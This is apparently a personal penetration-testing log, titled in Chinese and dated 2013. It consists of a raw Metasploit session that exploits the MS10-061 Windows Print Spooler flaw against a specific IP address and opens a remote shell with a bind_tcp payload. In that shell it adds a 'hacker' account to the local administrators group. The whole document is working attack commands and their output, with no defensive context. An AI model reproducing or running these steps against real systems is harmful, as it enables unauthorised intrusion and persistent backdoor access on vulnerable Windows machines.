渗透杂记-2013-07-13

[*] Please wait while the Metasploit Pro Console initializes...
[*] Starting Metasploit Console...
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 840 exploits - 495 auxiliary - 146 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops
[*] Successfully loaded plugin: pro
msf > search ms10_061
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms10_061_spoolss 2010-09-14 excellent Microsoft Print Spooler Service Impersonation
Vulnerability
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > info
Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 14976
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck <jduck@metasploit.com>
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Windows Universal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PNAME no The printer share name to use on the target
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE spoolss no The named pipe for the spooler service
Payload information:
Space: 1024
Avoid: 0 characters
Description:
This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.
References: http://www.osvdb.org/67988 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729 http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx msf exploit(ms10_061_spoolss) > set RHOST 142.168.2.20
RHOST => 142.168.2.20
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms10_061_spoolss) > info
Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 14976
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck <jduck@metasploit.com>
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Windows Universal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PNAME no The printer share name to use on the target
RHOST 142.168.2.20 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE spoolss no The named pipe for the spooler service
Payload information:
Space: 1024
Avoid: 0 characters
Description:
This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.
References: http://www.osvdb.org/67988 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729 http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx msf exploit(ms10_061_spoolss) > exploit
[*] Started bind handler
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
[*] Attempting to exploit MS10-061 via \\142.168.2.20\SmartPrinter ...
[*] Printer handle: 00000000950606c7fee7b348bc5b841597479b61
[*] Job started: 0x4
[*] Wrote 73802 bytes to %SystemRoot%\system32\9o43IDgKLE0SjU.exe
[*] Job started: 0x5
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\vWMbWpPJt8K6aD.mof
[*] Everything should be set, waiting for a session...
[*] Sending stage (240 bytes) to 142.168.2.20
Microsoft Windows XP [???? 5.1.2600]
(C) ???????? 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user
net user
\\ ??????????
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
IUSR_INTRA-PC IWAM_INTRA-PC shentouceshiwy
SUPPORT_388945a0
????????????????????????????????????
C:\WINDOWS\system32>net user hacker 123 /add & net localgroup administrators hacker /add
net user hacker 123 /add & net localgroup administrators hacker /add
??????????????
??????????????
C:\WINDOWS\system32>net user
net user
\\ ??????????
-------------------------------------------------------------------------------
Administrator Guest hacker
HelpAssistant IUSR_INTRA-PC IWAM_INTRA-PC
shentouceshiwy SUPPORT_388945a0
????????????????????????????????????
C:\WINDOWS\system32>